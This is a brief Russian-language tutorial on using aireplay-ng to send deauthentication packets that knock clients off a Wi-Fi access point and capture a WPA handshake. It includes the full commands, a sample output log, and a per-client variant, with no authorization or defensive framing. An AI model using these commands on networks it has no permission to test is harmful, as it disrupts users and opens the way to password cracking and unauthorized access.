Принудительно отключить пользователя от wifi сети нужно для 100% получения хендшейка.

Чтобы отключить всех клиентов точки доступа нужно выполнить эту команду в консоли:

aireplay-ng -0 3 -a MAC_АДРЕС ИНТЕРФЕЙС

Где:

  • MAC_АДРЕС – это BSSID атакуемой точки доступа
  • ИНТЕРФЕЙС – имя беспроводного интерфейса в режиме монитора (wlan0, wlan1….)
  • Ключ -0 означает деаутентификацию
  • Число 3 — количество пакетов
  • Ключ  -a — указывает мак адрес wifi точки

В моём случае команда выглядит так:

aireplay-ng -0 3 -a XX:XX:XX:XX:XX:XX wlan0

Программа выведет примерно следующее:

08:17:30 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).</client's>
08:17:30 Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
08:17:30 Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]
08:17:31 Sending DeAuth to broadcast -- BSSID: [XX:XX:XX:XX:XX:XX]

А в правом верхнем углу экрана для захвата данных появится новая запись:

WPA handshake: 00:1E:58:C6:AC:FB

Она означает, что рукопожатие успешно захвачено.

Чтобы отключить конкретного пользователя нужно выполнить эти команды:

aireplay-ng -0 3 -a МАК_АДРЕС_ТОЧКИ_ДОСТУПА -c МАК_АДРЕС_КЛИЕНТА ИНТЕРФЕЙС

Где:

  • Ключ -c — указывает мак адрес клиента точки доступа